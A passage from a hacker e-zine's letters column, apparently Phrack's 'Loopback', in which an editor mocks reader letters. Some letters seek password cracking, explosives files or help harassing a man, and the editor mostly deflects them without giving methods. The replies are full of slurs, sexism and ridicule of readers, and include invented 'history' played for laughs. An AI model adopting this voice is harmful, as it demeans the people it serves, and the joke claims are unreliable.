+Then again, maybe we don't hear about them because there ways are much more
+cleaver than that of a man.
+
+    [ Ok, I'm calling a no-way on this sentence here.  As in "no-way are you
+      *this* retarded". ]
+
+Women, and I'm applying this to myself as well, are naturally more sneaky
+and watchful.
+
+    [ If by sneaky and watchful you mean conniving and vindictive then I
+      agree with you. ]
+
+I know for a fact that women have hacked into sites and to systems,
+
+    [ Ah yes.  Thiz bringz me back.  I remember one little minx who hacked her
+      way right into my heart.  Did me up real good too, she did. ]
+
+but why do we still get no credit in the underground community?
+
+    [ End this suffrage of innocent hackess' now! ]
+
+Is it because we hid ourselves behind handles
+
+    [ Maybe it iz becuase you have love handlez? ]
+
+and tags,
+
+    [ Nametagz?  Like at Walgreenz? ]
+
+or because people don't want to actually give us the credit.
+
+    [ Well, personally, after reading this, I wouldn't give you a shred of
+      credit either. ]
+
+I have only heard of three cases where females were caught in a hack.
+
+    [ Shit.  3?  I can remember the great `chickhack `96` when 423 girlz were
+      all caught hacking.  I think their major flaw was that they all tried
+      to break into bebe.com at the same time. :( ]
+
+One girl got caught because while sending a file, she sent it to the wrong
+location on a server.
+
+    [ What like C:\windows\desktop? ]
+
+One was caught for phreaking, and the other one for obtaining products from an
+internet site by gaining root access and shipping them to her home, free of
+charge.  These are the only three cases I have found.  And they were all
+stupid reasons to get caught.  I know there are many people out there who hack
+and don't get caught, but the majority that do get caught, are men.  We don't
+do stuff like the chick from hackers, nor do we dress or act in that manner.
+
+    [ Well, I think we've identified your problem.  Angelina Jolie pretty much
+      sumz up whut everyone wantz to see in a hackess.  Mmmm.  Delicious
+      hackess treats. ]
+
+We go about our lives like most human beings, maybe even a little better.
+
+    [ Or in your case, a little dumber. ]
+
+We don't dress in all black, nor are we interested in only computers.  We are
+intelligent and beautiful.  We are the Hackesses.
+
+    [ Mmmmmm.  Hostess Hackesses. ]
+
+Mistress Diva
+
+|0x02|------------------------------------------------------------------------|
+
+Hi, my name is Adam and am regular guy with a home pc who is being hacked and
+violated by a military freak..
+
+    [ Military freak like Klinger on M.A.S.H. or military freak like that guy
+      in Commando who wore the chain mail shirt? ]
+
+seriously no shit. 
+
+    [ Oh.  Ok.  I though you were pulling my leg for second.  Sorry...  Back
+      on the clock now. ]
+
+i dont know where to start to ensure my pc security
+
+    [ Well if you didn't have a PC you wouldn't have this problem.  I say
+      get rid of it.  The end justifies the means. ]
+
+please reccomend some high level security methods and programs.
+
+    [ Have you tried ignoring it?  That sometimes works for me.  Barring that,
+      have you tried dealing with him?  I find that freaks (especially military
+      freaks) are usually pretty cordial when you deal with them on their
+      terms.  I say give in to his demands. ]
+
+if you cant do that then please reccommend any links i have found your site
+usefull because you provide elite items therefore i require your help please.
+
+    [ The highest level of security I can think of is God.  I recommend you
+      pray each night, and I'll forward this to him.  Together we *can* make
+      a difference. ]
+
+Adam Smith
+
+|0x03|------------------------------------------------------------------------|
+
+Page 2 is hilarious ... P55-02    ... scrap the rest and just keep publishing
+that page.  For issue #56 just republish one of the way older editions, it
+seems they are FINDING THOSE ONES!!@!@. :)
+
+    [ HAHAHAHAHHAHAHAHA.  Wait.  I don't get it. ]
+
+P.S. I don't have a computer either, I'm sending this via DSS and I'm typing
+on the Remote Control.
+
+    [ What do you mean, `either`?  Wait, is this Adam from above?  Hey man,
+      did you do what I recommended?  Did it work?  The forward to God bounced
+      so I wasn't sure if anything happened.  Good for you man! ]
+
+Anonymous
+
+|0x04|------------------------------------------------------------------------|
+
+Hi, Let me explain what I need for the job I do. I have what we call mystery
+diners which visit my restaurant each month, this is done by a firm called
+MARITZ in Berkshire, what I would like is the dates when they visit my
+restaurant so I can make myself available for the visit day, is this possible
+in any way.
+
+    [ If you knew then there wouldn't be any more mystery to it, now would
+      there?  What fun is that? ]
+
+Gary
+
+|0x05|------------------------------------------------------------------------|
+
+Does the author of article 52-9 have a degree in literature?
+
+    [ Definitely not.  However, I think he has a degree in money management.
+      Well, maybe not.  But he's SO very good with money.  Maybe he just likes
+      it alot.  Maybe it's something ingrained into his personality or
+      culture... ]
+
+If so, I think we made some sashimi together.
+
+    [ Maybe it was bagels? ]
+
+HeftyNuts
+
+    [ Hrm.  Do you get around ok?  Do you have a little wheelbarrow you put
+      them in? ]
+
+|0x06|------------------------------------------------------------------------|
+
+Hey Route,
+
+Just wanted to compliment you on Phrack 55. It's very well done, excellent
+articles, very clean and professional, and the Loopback is hilarious, as
+always. Exactly what it should be, and a lot more. Well done, keep up the
+good work and spreading the info. Thank you for spending your time to bring
+this to us.
+
+    [ SEE!?  Some people actually DO like me! ]
+
+EchoMirage
+
+|0x07|------------------------------------------------------------------------|
+
+I came to this page to see what kind of fucked up, twisted, LOSERS would run
+something like this!
+
+    [ Just your average run-of-the-mill sexier-than-cheescake losers.  The
+      kind with luscious filling. ]
+
+Phracked!  Phracked!?!  Boy, was I an ass.
+
+    [ Was? ]
+
+The editors comments are the funniest damn thing on the net right now.
+
+    [ I'm slicker this year. ]
+
+No kiddin'.  It's hilarious the number of people who think he's Percy
+-fuckn'- Ross
+
+    [ Yah.  The current count is at 384572. ]
+
+some sorta hacker dogooder out there to free humanity (or save little boys
+knee deep in there own shit).  You guys are hilarious.  I'll be back to read
+some more, please, keep up the good work.
+
+A New Fan
+
+    [ 384573. ]
+
+|0x08|------------------------------------------------------------------------|
+
+Hi -
+My name is Dawn, I think your commentary on other people's articles are
+absolutely hilarious and if you're not doing anything on Friday, I'd like to...
+
+    [ HOLY FUCK YOU'D LIKE TO WHAT?!@#!# ]
+
+just kidding!!
+
+    [ SWEET FUCKING CHRIST GIRL!  DON'T EVER DO THAT TO ME.  DO YOU KNOW
+      WHERE I'M COMING FROM? (A COLD LONELY PLACE WITH NO GIRLZ). ]
+
+Anyways! I just wanted to tell you how funny I think you are and I will now
+become an avid reader of Phrack because of your comic sarcasm!
+
+    [ How about you become an avid reader due to my irresistable charm and
+      unending appeal! *wink* *wink* *puppy dog face* ]
+
+;P love, Dawn
+
+    [ Love??@?#!?@#?  OMGOMGOMGOMGOMGOMG!  I'm getting butterfliez in my
+      tummy! ]
+
+Talk to you later I hope!
+
+    [ Dawn, do you by *any* chance happen to like food or sleeping or
+      procreation?  If so, I think we may have some thingz in common and we
+      definitely need to get together as soon as possible.  Please write me
+      back as soon as possible, only if you're hot though. ]
+
+|0x09|------------------------------------------------------------------------|
+
+Helu,
+
+First off, much thanks to the Phrack staff for producing a wonderful
+publication.. regardless of _WHEN_ they come out.  I have found them very
+informative since the current group tookover the whole process.
+
+    [ Group?  Paha.  I wish I had a staff.  It'z just me and my mom dude.
+      She doez the writing and I do the copy and editz. ]
+
+I read the article on "Building Bastion Routers Using Cisco IOS",
+
+    [ (p55-10). ]
+
+which was a decent piece and contained a lot of basic IOS information that
+would apply to building a bastion router.
+
+There was a part of a section however that I felt should've been covered a
+little more accurately,
+
+    [ WELL PREACH ON BROTHER!@ ]
+
+which was in the section entitled "Step 2 : Limit remote access".  The article
+mentions that there have been rumors that SSH would make it into Cisco IOS
+12.0, however it never made it in.  Now, I'm not certain when the actual
+article was written so it may just be that the article has old information.
+Nonetheless, there is SSH support included in Cisco IOS 12.05(S) and it works
+like a charm.   A few things worth noting about Cisco IOS 12.05(S):
+
+--   It is the preferred and recommended IOS release for Internet backbone
+     routers as well as for service providers ( i.e. perfect candidates for
+     bastion routers ).
+
+--   It runs on enterprise class routers.  Meaning the image runs on the
+     following hardware:  7200, 7500, and 12000 (GSR) series routers.
+
+--   It was released in July of 1999.
+
+
+So there are a lot of people that aren't running their operation on enterprise
+class routers, however a ton of NSPs and ISPs do; thus this information about
+SSH is worthy of mentioning.
+
+Anyways, keep up the excellent work.
+
+    [ Thankz for your input! ]
+
+Craig
+
+|0x0a|------------------------------------------------------------------------|
+
+Gentlemen,
+
+I enjoy reading your issues when you get them out and all I have to say is
+keep up the good work.
+
+ArgentRisk
+
+    [ See, I just like to pepper a few of these babies in here so you people
+      know that there are a precious few who like me and my mom. ]
+
+|0x0b|------------------------------------------------------------------------|
+
+Dear Sultan of Love, et al.,
+
+    [ Huh. ]
+
+I wanted to give some of your readers help on some of the stuff they sent in.
+
+One, get serious help.
+
+    [ Ok thankz! ]
+
+Two, check out the book "PIHKAL: Phenylalanines I Have Known and Loved."
+I can't remember who it's by, but it's got everything you ever wanted to know
+about psychotropics, psychodelics, and more... much, much more.  Read and
+practice at your discretion.
+
+    [ You suck.  You recommend a book _you_ can't remember with some
+      goofy-ass title _I_ can't remember? ]
+
+Three, I lived in Japan and had peanut butter sent to me, because peanut
+butter made in Japan is awful.
+
+    [ It didn't use to be.  Back in the 1920's and 1930's Japanese peanut
+      butter was considered to be the best in world.  Mercenary ronin were
+      often paid off with jars of the stuff.  This all changed after WWII.
+      Recently declassified State Department documents bring light to the fact
+      that several key strategic targets during WWII bombing raids were the
+      Japanese peanut butter factories.   The documents list the reason for
+      the strategic importance as "creamy goodness".  Pundits charge however
+      that the U.S. just couldn't live with Japan having the peanut butter
+      edge.  Either way, we bombed the Japanese peanut industry back into the
+      stone age. ]
+
+The guy who talked about smuggling drugs into Japan in peanut butter has
+really fubar'd.  Some poor shmuck in Japanese customs is going to be opening
+up my decent edible peanut butter.  For godsakes, guys, necessity may be the
+mother of invention, but sometimes it's just a mother.
+
+    [ LEAVE MY MOM OUT OF THIS, JERKOFF! ]
+
+Leave well enough alone.
+
+    [ Now why on earth should our drug-loving friends in Japan be held hostage
+      by your desire to eat 'Jiffy' instead 'Mister Super Happy Fun Peanut
+      Butter Joy'? ]
+
+Lastly, I actually don't have a thing to say about computers.  I'm a med
+student and know next to nothing about computers.  I just wanted to let you
+know that you guys are so funny you put me in tears.  Do you really have a
+hard time meeting chicks?!
+
+    [ Not meeting them, no.  Just talking to them.  I tend to drool. ]
+
+I don't believe it.
+
+    [ Are you coming on to me? ]
+
+Uma
+
+    [ Goddess? ]
+
+|0x0c|------------------------------------------------------------------------|
+
+Hi!
+
+I wondered if you could help me to crack userpasswords from PWL-files.
+
+    [ Do you often submit passing musings to Underground Journalz? ]
+
+I'm having a project about computer security at school and it would be nice to
+have this as an example.
+
+    [ I'm having a hard time caring. ]
+
+Tom Erik Gundersen
+
+|0x0d|------------------------------------------------------------------------|
+
+    [ (p55-17). ]
+
+Someone please tell our friend here that Cisco has already implemented
+dynamic access control for the H.323 protocol starting with version 12.0 of
+the IOS software (in the firewall extension -12.0fw-).
+
+    [ Done! ]
+
+Anonymous
+
+|0x0e|------------------------------------------------------------------------|
+
+I've just finished studying a copy of the K&R/ANSI C tutorial I found in my
+library, and I'm very interested in moving onto writing C programs that use
+the serial or parallel ports.
+
+    [ Excellent reference book. ]
+
+I'm trying to create my own simple electronic devices to connect to my
+computer, but I am having locating a good resource or tutorial that discusses
+serial/parallel port programming.  Could you give me a good site please?
+
+    [ http://www.eng.auburn.edu/users/doug/serial.html and
+      http://www.syclus.com/cscene/CS4/CS4-01.html are decent. ]
+
+BTW, the mag is great. Keep up the good work :)
+
+    [ Thankz.  Good luck with your programming! ]
+
+Anonymous
+
+|0x0f|------------------------------------------------------------------------|
+
+Hey, i was browsing through the web and i came to your page, i was just
+wondering what Phrack Magazine actually was about, the articles seemed really
+intereting and i want to get a subscription.  The web site didn't explain a
+lot for me, i'm sorry for bothering you, thanks a lot.
+
+    [ Do you get tired putting your socks on?  Do you get lost on your way
+      to the kitchen?  You may be retarded.  Check with your family doctor. ]
+
+Anonymous
+
+|0x10|------------------------------------------------------------------------|
+
+My name is route and I'm so elite that I have to make love to my hand three
+times a day.
+
+    [ YA-HA.  I wish!  Three times a day in some fantasy world maybe!  No, I'm
+      pretty much a one timer, then it'z rite off to sleep! ]
+
+I can't get rid of all the spots on my silly geeky face
+
+    [ They told me the radiation burns would go away after a few months. :( ]
+
+and I'm still a virgin.
+
+    [ Hah!  Apparently SOMEONE hasn't been checking the #hack sexchart:
+      http://www.escape.com/~max-q/sexchart.shtml)! ]
+
+Why are all hackers such fucking losers?
+
+    [ Why are there so many, songs about rainbows? ]
+
+All the articles in phrack could have been written by a 12 year old.
+
+    [ Man.  That would have to one 12 year old with ALOT of free time. ]
+
+Do any of you faggots even have any computing qualifications?
+
+    [ I'll have you know, mister smartguy, that I got a degree from Devry! ]
+
+And have any of you ever even kissed a girl?
+
+    [ Well, I've seen picturez of girlz being kissed, doez that count? ]
+
+Dr Robert Gray <bobgray38@hotmail.com>
+
+    [ I'm almost positive the good doctor wanted people to email him there
+      with commentz to his letter. ]
+
+|0x11|------------------------------------------------------------------------|
+
+Hello,
+
+I just wanted to write to tell you that I recently read the "Phrack Loopback"
+in Phrack55.  I enjoyed the last letter about the McDonalds article so I
+decided to read it.  I worked at Mc Donalds for a couple years back in High
+School, and let me tell you that this article had me laughing so hard I was
+crying.  Keep up the good work.
+
+Ryan
+
+    [ Crying because you worked at Mc Donalds for a couple yearz or crying
+      because you've only moved up to Wendy'z? ]
+
+|0x12|------------------------------------------------------------------------|
+
+Hi, I know you have better things to do.
+
+    [ Nope!  Not really! ]
+
+But I didnt know who to turn to.
+
+    [ Did you try the A-team?  I hear that if you have a problem, if no one
+      else can help you and if you can find them, maybe you can hire: the
+      A-team. ]
+
+I had my tax documents and other stuff protected with encypted magic folders.
+
+    [ Hrm.  Are we talking David Copperfield kinda magic or Merlin kinda
+      magic? ]
+
+I got the whole thing copied to a CD. The only thing i did wrong was that I
+didnt decrypt it. After that I was having problems with my software so I
+formatted my hard drive.
+
+    [ Geeze.  Way to go moron. ]
+
+Now the problem is that I have lost my recovery floppy.
+
+    [ Hhahahaha!  Holy shit that sucks! ]
+
+I dont know how to access the files. I have them on the CD but they are all
+encrypted and stuff. What should I do. I really do need your help.
+
+Please do reply,
+   
+Ali Tariq
+
+p.s. If you want me to send a file (encryted one) I will send it so that you
+can test different utilities on it.
+
+    [ Of course!  Want me to do your taxez if I crack the file too? ]
+
+|0x13|------------------------------------------------------------------------|
+
+My brother has spent the last week reading Phrack.  He's a total fucking
+idiot (doesn't run in the family, maybe he's adopted...  I can only hope for
+so much) and now he thinks he's a hacker.  He goes into chat rooms and
+threatens to send people viruses when he can't even tie his own fucking
+shoe laces!
+
+    [ Yeah, but with the advent of velcro who needs to tie their own shoes? ]
+
+Shame on you for letting total fucking retards read Phrack!
+
+    [ We let you read Phrack. ]
+
+Linux Bitch
+
+    [ Well, "Linux Bitch", Phrack is an equal opportunity magazine.  We don't
+      ostricize the retarded simply because they may drool ocassionally or
+      maybe sit in their own filth.  Nay.  We encourage people of all levelz of
+      retardation to bask in the wealth of knowledge that each little
+      character brings.  We believe that knowledge is meant to be free, and
+      sometimes knowledge seeks out the path of least resistance, and
+      sometimes it takez more difficult route.  Ok, and sometimez knowledge
+      just quitz half-way there and goez drinking with hiz buddiez.  I totally
+      forgot my point. 
+
+|0x14|------------------------------------------------------------------------|
+
+Hey
+What is u?  r comments about scientists who's creating machines thinking like
+humans, as well as looking as humans - so called humanoids?  Does it scares u
+or do u not care?  I'm searching for people who can fight Artificial
+Intelligence back.  People with H/C/P skills as well as explosives.  Please
+mail me ASAP, it's urgent.  It's our future.
+
+Q Wakee
+
+    [ Mister Wakee, this is a problem that I have seen coming since Atari'z
+      Pong first entered, nay --invaded-- our homez.  I've been waiting for a
+      man of action to step forward for a long, long time.  In fact, since
+      1990, I've been running my own underground resistance (it'z called HAHA
+      (Humanz against hostile androidz)).  Until now, I thought I was the only
+      one (my resistance has a membership of 1 (one)).  We should definitely
+      team up and fight this disgusting menace together.  I'll bring the
+      doughnutz and lotion, you bring the robot stopping gunz.  Do you have
+      any brochurez?  I've been working on one entitled "So You Want to Stop
+      Humanoid Robotz".  It'z pretty much industry standard boilerplate stuff,
+      with pop-ups of me shooting robots and some scratch-and-sniff conspiracy
+      theories.  Please let me know when we can have our first meeting, oh
+      we'll have to use your compound because my mom doesn't let me have
+      people over anymore. ]
+
+|0x15|------------------------------------------------------------------------|
+
+im confused, what do u guys actually do at phrack?
+
+    [ Phrack is a puppet company setup by the CIA to covertly gather
+      intelligence on the tragically retarded.  It's been a goldmine! ]
+
+Anonymous
+
+|0x16|------------------------------------------------------------------------|
+
+1) Phrack's cool
+
+    [ Like Norway! ]
+
+2) Im makin a page on x-plosives etc.  Ive noticed a few of your ish's
+contain xtracts from the Poor Man's James Bond.  If whoever of you haz it
+could advise me as to were I could get a phile of this, or send me one,
+
+    [ http://www.darwinawards.com/legends/legends1999-10.html ]
+
+or publish more ish's with anarchy stuff, it'd be k-appreciated.
+
+    [ You're a k-idiot. ]
+
+Anonymous
+
+|0x17|------------------------------------------------------------------------|
+
+Glad to have you back and many thanks.
+
+    [ Well I'm glad to have YOU back mister toughguy! ]
+
+Always enjoy the articles.  Nice job frying the fools too.  About had me out
+of my chair.  Pardon the lame e-mail addy, but visiting the folks right now.
+
+    [ Yah, how iz mom'z sexual-addiction treatment coming along? ]
+
+Symbolic constant, very good, wish I'd thought of it.
+
+    [ Paha!  BUT YOU DIDN'T, DID YOU?  I DID!  PROPZ TO ME! ]
+
+Guess I'll have to renew the Phrack link on my page.
+
+    [ SAINTZ BE PRASIED! ]
+
+Put ya next to Fyodor.
+
+    [ Gee, nestled between one-hit wonder Fyodor and probably antionline,
+      wonerful.  I'll listen to you now and kill myself later. ]
+
+Hasta,
+Spiny_Norman
+
+    [ Like Norman Fell, t.v.'z Mister Roper from Three'z Company? (A poor
+      man'z Don Knottz if you ask me.) ]
+
+|0x18|------------------------------------------------------------------------|
+
+In my English class for school we were asked to write a persuasive essay
+about anything we wanted.  At first I was going to do mine on 'Are their
+really extraterrestrials?'
+
+    [ HOLY SHIT THAT'Z AWESOME! ]
+
+But I decided that was stupid
+
+    [ Oh wait, you're right.  Idiot. ]
+
+and found I know more about hacking then anything.
+
+    [ Uh huh. ]
+
+The only problem is, I have no clue what question to answer.  Got any ideas???
+
+Anonymous
+
+    [ How about `Why I'm a Retard by Anonymous Dork` or `Why I Know More
+      About Hacking Than Anything (subtitle: and I really don't know anything
+      about anything` or `Darwin Was Wrong: An Essay On Me`. ]
+
+|0x19|------------------------------------------------------------------------|
+
+how do i get other people's IP addres??  do u know?
+
+    [ Oh yes.  OH YES.  I know.  Absolutely I do.  I know this little arcane
+      tidbit.  No way am I telling you though.  NOooooooo Way.  I can't just
+      be giving away all the secretz can I? ]
+
+Anonymous
+
+|0x1a|------------------------------------------------------------------------|
+
+Greetings,
+
+just in case the folks who write to you asking for manuals for Darwin Award
+Delivery Devices are not sufficiently intimidated by your usual "you will
+die, I hope you understand" response, I thought I'd pass this info along:
+
+at least Massachusetts, though probably many other states as well, has what it
+calls an Infernal Device law.  This law defines an "infernal device" loosely
+to cover things that will get idiots killed in their parents' basement, and
+then bans it.  So it's not just the Grim Reaper who awaits people who try to
+put lighter fluid in their supersoakers, but also The Man.
+
+#include<love_your_mag.h>
+
+UnhandledVagrant22
+
+    [ Hrm, how are the other 21 unhandledVagrantz doing anyway?  Any of you
+      found work yet?  You know, the life of a hobo, while seeming glamorous
+      and sexy, isn't all the brochurez make it to be.  Come home.  Your
+      mother and I miss you terribly. ]
+
+|0x1b|------------------------------------------------------------------------|
+
+I am really sorry to bother you with this question but I am desperate.
+
+    [ I'm desperate too, but prolly a different kind of desperate. ]
+
+I know that there is a folder on the PC that stores all the mail you have
+ever written.  Even mail that you have deleted.  As you can see I am on
+AOsmelL.  I wrote some mail at work and on Monday morning, if not sooner...
+my boss is going to see it.  Where is that file?  I have to get to it so I
+can get the mail out of there.
+
+    [ If you're going to have an affair with your boss's wife at least be
+      smart enough to NOT write her love letters on HIS computer.  Haha.
+      Dummy.  You're gonna be unemployed. ]
+
+Thank you in advance for any help you can give me.
+
+    [ Move to a new town and start over. ]
+
+Anonymous
+
+|0x1c|------------------------------------------------------------------------|
+
+    [ (p55-04). ]
+
+> There is also another reason why W. Richard Stevens is
+> featured here -- he was to be the prophile for Phrack 55.
+
+This is just all so incredibly sad. What a loss.
+Thank you for P55.
+
+    [ Agreed.  Thankz for your support and condolences. ]
+
+Yours,
+Josh Birnbaum (noOrg).
+
+|0x1d|------------------------------------------------------------------------|
+
+i think you should know that a well known hacker by the name of "the jolly
+rodger" (the one with the cook book), is extracting philes from the archives
+and putting them in his cook book with out giving the nessecery credit to the
+writers.
+
+    [ Does he include recipes for crayon sandwiches?  Coz that'z renz's
+      personal recipe and he should definitely give due credit. ]
+
+he may say that the philes were writen by him,but the fact that they
+are written word for word, points to him as the cuprit.
+
+HACK SAW
+
+    [ JIM DUGGAN?  HEEEEYOH! ]
+
+|0x1e|------------------------------------------------------------------------|
+
+I AM IGOR. I AM BRASIL.  I NOW UNDERSTEND VERY WELL OF INGLAS,.
+I NEED OF THE DRIVER FOR HAKCKERS, FOR ME INVASION THE COMPUTERS FROM
+THE PEOPLES.  YOU UNDERSTEND??
+
+    [ I AM DISRESPECTFUL TO DIRT.  CAN YOU SEE THAT I AM SERIOUS? ]
+
+OBS:CORCEL OF TROIA.
+
+IGOR
+
+    [ OUT OF MY WAY, ALL OF YOU.  THIS IS NO PLACE FOR LOAFERS!  JOIN ME OR
+      DIE!  CAN YOU DO ANY LESS? ]
+
+|0x1f|------------------------------------------------------------------------|
+
+My name is Thomas and am currently still in what you would call in America as
+senior high.   I'm 15 years old and found this Phrack page while i was surfing
+on the net.
+
+    [ Well I see you've done your homework.  Nice work Thomas! ]
+
+I've always wanted to become involved in the art of hacking and i really don't
+know how to really start i've had my computer for about 2 and some years and
+catch on to things preety well and was wondering where to go from here.
+
+    [ Let'z plug that into the career calculator and see what she comes up
+      with.....  Ok..  Yes..  Let'z see here...
+
+        - 30.98% Help desk for regional fast food new hire processing office
+        - 30.56% Junior copier repair engineer
+        - 15.40% NO CAREER FOUND
+        - 12.45% Phone support engineer for the outdoor furniture industry
+        - 10.61% "Associate"
+
+      Hrm.  Lookz bleak. ]
+
+All i wanted to ask you if you can help me out by telling me how i can start
+out,i don't intend to reach a master level even though it is an aspiration of
+mine.
+
+    [ Whoa Tommy.  Rome wasn't built in a day, and neither are superhackers.
+      Start small, keep at it, and take your vitamins and say your prayers
+      like a good little Hulkamaniac. ]
+
+I'm currently using my brothers computer because it's a shit load faster
+than mine and would appreciate it if you could write back and maybe give me
+some good insight on how i can start out which probably would involve a lot of
+reading and learning more about programing. 
+
+    [ My first bit of advice is for you to *definitely* steal your brother's
+      computer.  Survival of the fittest my boy!  And besides, one of the
+      many traits of a superhacker is how fast he can run crackerjack on passwd
+      files (and yes this implies you should be running DOS -- Unix is a fad).
+
+      My second bit of advice is to read as much as possible.  Anything By
+      the late W. Richard Stevens.  Check out http://www.securityfocus.com.
+      Keep up to date with current eventz in the security world.  Try and make
+      friends in the scene.
+
+      My third bit of advice is to give up at the first sign of adversity or
+      difficulty.  Life rewards cowards, Thomas.  Never forget that
+      (persistence pays off in the long run but laziness pays off right
+      away). ]
+
+PS:thankyou for taking the time out to read my message
+                 
+    [ The pleasure was all mine, Son. ]
+
+Thomas
+
+|0x20|------------------------------------------------------------------------|
+
+my ingles Sux....
+
+    [ It'z ok, so doez my Spanish. ]
+
+it will be that you source of the accountant of its page could me seder codi?
+
+    [ "SOMETHING FUNNY AND DISJOINTED IN SPANISH HERE" ]
+
+Claudio
+
+|0x21|------------------------------------------------------------------------|
+
+Hi Phrack Staff.
+
+    [ Hi Emil. ]
+
+Before I start pleading with you i'd just like to say that you have the best
+E-Zine on the Internet.
+
+    [ Thanks :). ]
+
+I've followed your magazine for about 2 years now. But, as i searched your
+archive i've noticed that now you have almost no sections on things that go
+boom (Anarchy etc) anymore.
+
+    [ Our explosives consultant left for a higher paying job :(. ]
+
+I have a vast knowledge of that subject and how to perform things like
+pyrotechnics safely.  I do not know much about encoding (public key lock, i
+think?) and hacking. But as i said, i am ELITE in pyrotechnics.
+
+    [ Performing pyrotechnics safely?  That's like getting drunk without loaded
+      guns nearby or sex with your cousin..  It may seem like a fun idea, but
+      at the end of the day it'z just kind of a letdown. ]
+
+Soooo, please could I submit to Phrack on pyrotechnics and things that go boom.
+
+    [ Like an 808 trigger on a bass drum? ]
+
+I might need some help on encoding, if its really necessery. I am prepared to
+give up time for Phrack and it would be great if i could submit.
+
+    [ Hrm.  I don't think we have any openingz at the moment..  Tell you what
+      you get me a resume, and I PROMISE to call you when something opens up. ]
+
+Maddoc99
+
+|0x22|------------------------------------------------------------------------|
+
+Hello, friends, I want to congratulate you and tell you gon on, your
+stuff is the best.  I need some direccions of www where I can find information
+about phreaking in spanish, so I can read it more easily.  Thanks you very
+much, continue with your job!!
+
+romadryn
+
+    [ http://babelfish.altavista.digital.com/.  You're on your own past that,
+      hombre. ]
+
+|0x23|------------------------------------------------------------------------|
+
+I would just like to say that I have been reading phrack for about 2 years
+and the current issue has some really good technical articles, better than
+most others.
+
+    [ Well thank you very much! ]
+
+Thanks for all the shit you put up with, you guys are really funny too,
+loopback is better than comedy central.
+
+Anonymous
+
+    [ Awe, get out of here!  Even better than `The Man Show`?  (Which I'm
+      certain will win an Emmy soon.) ]
+
+|0x24|------------------------------------------------------------------------|
+
+hola .........disculpa que sea breve...pero tengo tanto sueo...y es
+tan tarde.....como las 4am me llamo gabriel y vivo en panama...aqui la gente
+ingora que es un hacker.... bueno deseo saber como puedo ser un hacker....
+soy un prinipiante..... lo primero que deseo saber es como puedo hacer para
+conseguir alguna cccclave de acceso a internet dentro de panama.....
+si me pueden ayudar o no contestenme porfavor......descuiden yo soy una
+persona de confiar...soy muy leal ...lo juro..... bueno me voy a dormir.....
+choao y gracias anticipadamente........
+
+Gabriel
+
+    [ Ok, let'z run this baby through a translator (http://translator.go.com):
+
+          hello........disculpa that is brief... but I have so much sue\xf1o...
+          and is so late.....como 4am I am called Gabriel and alive in Panama...
+          aqui the ingora people who are to hacker.... good desire to know like
+          I can be to hacker.... I am a prinipiante..... first that desire to
+          know is since I can make to obtain some cccclave of access to
+          Internet within Panama..... if they can help me or contestenme
+          porfavor good right of perpetual ownership does not.....descuiden I
+          I am a person to trust...  I am very loyal... it..... I am going
+          away to early sleep..... choao and thanks........
+
+      ...It's still unreadable... *sigh*.  DON'T YOU PEOPLE GET SESAME STREET 
+      DOWN THERE!?  Err...  ?DON'T USTED CONSIGUE LA CALLE DEL SISAMO ABAJO
+      ALLM!? ]
+
+|0x25|------------------------------------------------------------------------|
+
+I was informed that certain clans have starcraft programs that enable users to
+purge others in a multi-player game.  Are you familiar with this and if so do
+you know where I can evaluate such programs.
+
+Matt
+
+    [ Hey, I have an idea, it's called HARD WORK AND HONEST SPORTSMANSHIP.
+      Look into it dork! ]
+
+|0x26|------------------------------------------------------------------------|
+
+Well i stumbled onto this web-site, i was looking into alternative reading.
+Let me say this is by far the best. Dark Secrets of the underground is good,
+but you have collected all your issues in an easy to read format.
+
+    [ Yah, ASCII is pretty cool, huh? ]
+
+Anyway i don't want to sound like some Asshole trying to kiss an ass,
+
+    [ Whut lovely imagery you've conjured up. ]
+
+and if i did then Fuck you.
+
+    [ Hey eat a dick, count fagula. ]
+
+When are you guys publishing more issues, 55 is coming soon i know...
+
+    [ Phrack 55?  What year do you think it is? ]
+
+but what of the rest. 
+
+    [ Um...  If issue "55" is coming 'soon' then logic dictates 'the rest'
+      will arrive 'later than soon.'  Good luck to you and don't chew gum when
+      you walk. ]
+
+It is some good shit, let me tell you.  By the way where are you guys located?
+State that is.
+
+    [ It usually variez from statez of confusion to statez of depression...
+      Sometimez though we find ourselvez in statez of high hilarity.  Dependz
+      on the time of the year, ya know? ]
+
+Ash B<O>M
+
+|0x27|------------------------------------------------------------------------|
+
+Hello,
+I have not the tiniest idea of who you are,
+
+    [ Now we have common ground! ]
+
+but yet I ask for your help.
+
+    [ Now you've lost me. ]
+
+I am interested in learning the fine art of obtaining information via
+cyberspace (hacking) sounds like a Jeffrey Dahmer hobby to me.
+
+    [ What in the Christ are you talking about? ]
+
+Obviously you are not an idiot so this is why I ask this! Can someone or
+somebody
+
+    [ Someone or somebody? ]
+
+recommend how to study the art of the Jeffrey Dahmer hobby (please do not give
+me a I.Q -1 reply)
+
+    [ You can't be serious. ]
+
+I am serious!
+
+    [ Oh. ]
+
+There is alot of talent out here and I want to find a mentor.
+
+    [ Ok.  Let me get this straight.  You're looking to me, Phrack Magazine
+      editor and fun-loving happy-fun guy route, to find you a
+      gay-massmurdering-cannibal mentor? ]
+
+Thank you, and I think the KKK are a bunch of f...... schnooks!!!!!!!!!!!!!!!
+
+    [  Of course, but eating people, that's ok rite? ]
+
+P.S- In no way am I associated with any law enforcement agency
+
+    [ Gosh, ya think? ]
+
+|0x28|------------------------------------------------------------------------|
+
+I need help digging up as much information on a guy who is having an affair
+with the wife of a friend of mine - it's tearing apart his 18 year marriage
+and screwing up his two young kids.
+
+    [ Can't you just ask her? ]
+
+I'd like someone to tell me where and/or how to get massive info and then how
+to make life "interesting" for this marriage wrecker -
+
+    [ Well, have you tried taking him on a "mystery vacation"?  You know,
+      get all the boyz together, jump in the car, and not tell him where you're
+      going (make it real exotic like Yemen or Oman)! ]
+
+However you guys do that neat stuff (e-mail bombs, trojans, etc)
+
+    [ Oh!  *That* neat stuff.  We just subcontract it all out. ]
+
+I would appreciate ANYTHING you can do for me to help my friend.
+
+    [ http://www.privat.katedral.se/~nv96olli/java.htm ]
+
+Rich
+
+|0x29|------------------------------------------------------------------------|
+
+To:  The Sultan of Love,
+
+Your humor leaves me jaw agape, sides splitting and a newfound demand for
+Depends Brand Adult Diapers.
+
+    [ Grody. ]
+
+The world needs more of you.
+
+    [ Well, I'm kinda partial to instead of *more* of me (ala multiplicity)
+      I think what the World needz, iz a GIANT me (ala The Amazing Colossal
+      Man).  I dunno, I think maybe a 50 or 60 foot me would get the job
+      done, and get it done right. ]
+
+I didn't see too many letters in Phrack 55 from teenage chicks offering you
